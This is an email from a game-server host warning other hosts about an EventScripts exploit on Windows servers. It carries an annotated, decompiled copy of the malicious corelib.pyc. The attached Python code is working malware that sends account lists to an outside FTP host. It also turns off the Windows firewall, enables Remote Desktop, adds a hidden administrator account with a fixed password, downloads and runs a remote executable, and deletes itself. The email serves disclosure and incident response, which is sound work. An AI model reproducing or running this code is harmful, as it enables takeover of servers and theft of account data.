Hi Guys,
I wanted to shoot out an email to everyone in regards to an exploit we have
come across today for those who are running Eventscripts & windows based
servers.
Apparently a user is able to upload "corelib.pyc" to the game server without
using the usual FTP/control panel, via the game server itself. In turn,
using eventscripts he is able to execute his script, create an administrator
with full remote desktop access and finally remove all his files once his
account is created.
Our security caught it before it was able to cause us any issues, however
this may be an issue for people who have less security in place,
especially if you do not have an anti-virus/firewall running on the
machine.
We have also found there are multiple variations of this file, so you may
want to be sure you do a full check of your machines.
With that being said, the files are coming from a free web hosting account
over at t35.com - So if your machines have seen any connections in/out bound
to that host in the past 48 hours, I would highly suggest you check your
machines.
Now on to the hosts on this list, we also found this in his scripts:
C:\Games\rzr00\GameServers\TC55505872742137586643251\cstrike\addons\eventscripts\wcs\WCSusers\es_wcsusers_db.txt
So he was testing this somewhere else, someone else who is running TCAdmin -
If this is yours, I would start checking your boxes.
Attached is a decrypted copy of the corelib.pyc.
Joys,
-Lane
Fri Feb 26 22:35:10 2010
decompile /tmp/upload/20100226223510_753.pyc...
#! /usr/bin/env python
# emacs-mode: -*- python-*-
# -*- coding: utf-8 -*-
from ftplib import FTP
import os
import urllib
import es
import sys
import os.path
import operator
import subprocess
import time
def upload(handle, filename):
# Pushes a local file over an already-authenticated FTP session (`handle`)
# with STOR. The remote name is `filename` exactly as given, so the absolute
# local path the caller passes is reused verbatim on the server. Python 2
# code (print statements); indentation was lost in transcription, so the
# structure below is read from the decompiler output, not from columns.
f = open(filename, 'rb')
(base, ext,) = os.path.splitext(filename)
picext = '.bmp .jpg .jpeg .dib .tif .tiff .gif .png'
# Substring test against the space-joined extension list, not an exact
# match: an empty extension ('') is also "contained" and takes this branch.
if operator.contains(picext, ext):
try:
# Same STOR as the generic branch below, only with blocksize 1.
handle.storbinary(('STOR ' + filename), f, 1)
except Exception:
print 'erorr'
else:
print 'sucessup'
f.close()
return None
try:
handle.storbinary(('STOR ' + filename), f)
except Exception:
# The status strings say "download" although this path uploads.
print 'Error in downloading the remote file.'
else:
print 'Successful download!'
f.close()
def download(handle, filename):
# Pulls `filename` from the FTP session into a local file of the same name
# (opened 'wb'). Not called anywhere in this listing. Python 2 code.
f2 = open(filename, 'wb')
try:
handle.retrbinary(('RETR ' + filename), f2.write)
except Exception:
# Failure and success both print 'lol'; on failure the function returns
# before f2.close() runs, so the partially written file stays open.
print 'lol'
return None
else:
print 'lol'
f2.close()
def load():
# Presumably the EventScripts load hook (nothing else in this listing calls
# it). Analyst annotation of what the visible code does, for detection/IR:
#   1. dump `net user` output to <drive>:\<remote body>.log and upload it to
#      ftp.t35.com (directory 'Quantum'),
#   2. set EnableFirewall=0 and fDenyTSConnections=0 via REG ADD,
#   3. create local user 'bw' and add it to administrator groups,
#   4. fetch an EXE to <drive>:\rawr.exe and execute it,
#   5. unload the addon and delete its own corelib.py.
# Host artifacts: the .log file and rawr.exe at the drive root, the 'bw'
# account, the two registry values. Network: t35.com, cjlax.com,
# stashbox.org. Python 2 code; indentation lost in transcription.
print 'Getting Paths'
# This script's own path under the EventScripts game dir; used only for the
# size check and the self-delete at the end.
thisfile = (str(es.ServerVar('eventscripts_gamedir')) +
'\\addons\\eventscripts\\corelib\\corelib.py')
# Drive letter of the current working directory, e.g. 'C:\\'.
root = (os.getcwd()[0] + ':\\')
host_name = 'ftp.t35.com'
# Dead code for this literal hostname: there is no 'http://' or newline.
if ('http://' in host_name):
host_name = host_name.replace('http://', '')
host_name = host_name.replace('\n', '')
# FTP credentials appear as '*' in this copy (redacted or placeholder).
user = '*'
pwd = '*'
try:
ftph = FTP(host_name)
# Bare except; raw_input() would block the hosting process before exiting.
except:
print 'Host could not be resolved'
raw_input()
sys.exit()
try:
ftph.login(user, pwd)
except Exception:
if ((user == 'anonymous') or (((user == 'Anonymous') and (pwd ==
'anonymous')) or (pwd == 'Anonymous'))):
print 'The server does not accept anonymous requests'
raw_input()
sys.exit()
else:
print 'Invalid login combination'
raw_input()
sys.exit()
else:
print 'Successfully connected'
print ftph.getwelcome()
# flag, count, path and charset are never read afterwards; presumably
# leftovers from a larger interactive FTP client this was cut from.
flag = 1
count = 0
path = ftph.pwd()
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
print 'Press help at any time to see proper usage.\n'
# Remote drop directory on the FTP host.
dirpath = 'Quantum'
ftph.cwd(dirpath)
# Reads up to 114 bytes from a remote ip.php and uses the body as a file
# name component -- presumably the victim's public IP; not verified here.
url = urllib.URLopener()
resp = url.open('http://www.cjlax.com/ocean/ip.php')
html = resp.read(114)
ippath = ((root + html) + '.log')
# Writes the local account list to that file, waits, then exfiltrates it.
os.popen(('net user > %s' % ippath))
time.sleep(5)
upload(ftph, ('%s' % ippath))
ftph.close()
print 'Setting Up Remote Desktop'
# Registry changes: EnableFirewall=0 (Windows Firewall off, standard
# profile) and fDenyTSConnections=0 (Remote Desktop on), both forced (/f).
os.system('REG ADD
HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile
/v "EnableFirewall" /t REG_DWORD /d "0" /f')
os.system('REG ADD
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0 /f')
print 'Creating Users'
# Local account 'bw' with a hard-coded password, then added to the
# administrators group under several localized spellings, plus one attempt
# on the domain 'Domain Admins' group.
os.system('net user bw 313313313 /add')
os.system('net localgroup Administrator bw /add ')
os.system('net group "Domain Admins" bw /add')
os.system('net localgroup administrators bw /add')
os.system('net localgroup administrator bw /add')
os.system('net localgroup administratoren bw /add')
os.system('net localgroup administradors bw /add')
os.system('net localgroup administrateurs bw /add')
print 'Downloading'
# Second-stage executable, saved as <drive>:\rawr.exe.
url = 'http://stashbox.org/806008/Windows%20Host%20Process.exe'
save = (root + 'rawr.exe')
try:
urllib.urlretrieve(url, save)
except:
# The '%' is applied to es.msg()'s return value, not to the format string,
# so the message sent is the literal '#green er:%s'; if es.msg returns
# None this line itself raises TypeError (return type not visible here).
(es.msg('#multi', '#green er:%s') % sys.exc_info()[0])
print 'Finished Downloading'
print 'Executing.'
# The size guard reads `thisfile` (this script), not `save`, so the
# downloaded EXE is launched regardless of whether the download succeeded.
b = os.path.getsize(thisfile)
if (b < 1000):
es.msg('#multi', '#green : bad download.')
else:
os.system(save)
print 'Removeing'
es.msg('#multi', '#lightgreen Removing.')
# Cleanup: unload the addon and delete its own source file.
es.server.queuecmd('es_unload corelib')
os.remove(thisfile)
print 'Finished'
# local variables:
# tab-width: 4
depythoned 1 files: 1 okay, 0 failed
Fri Feb 26 22:35:12 2010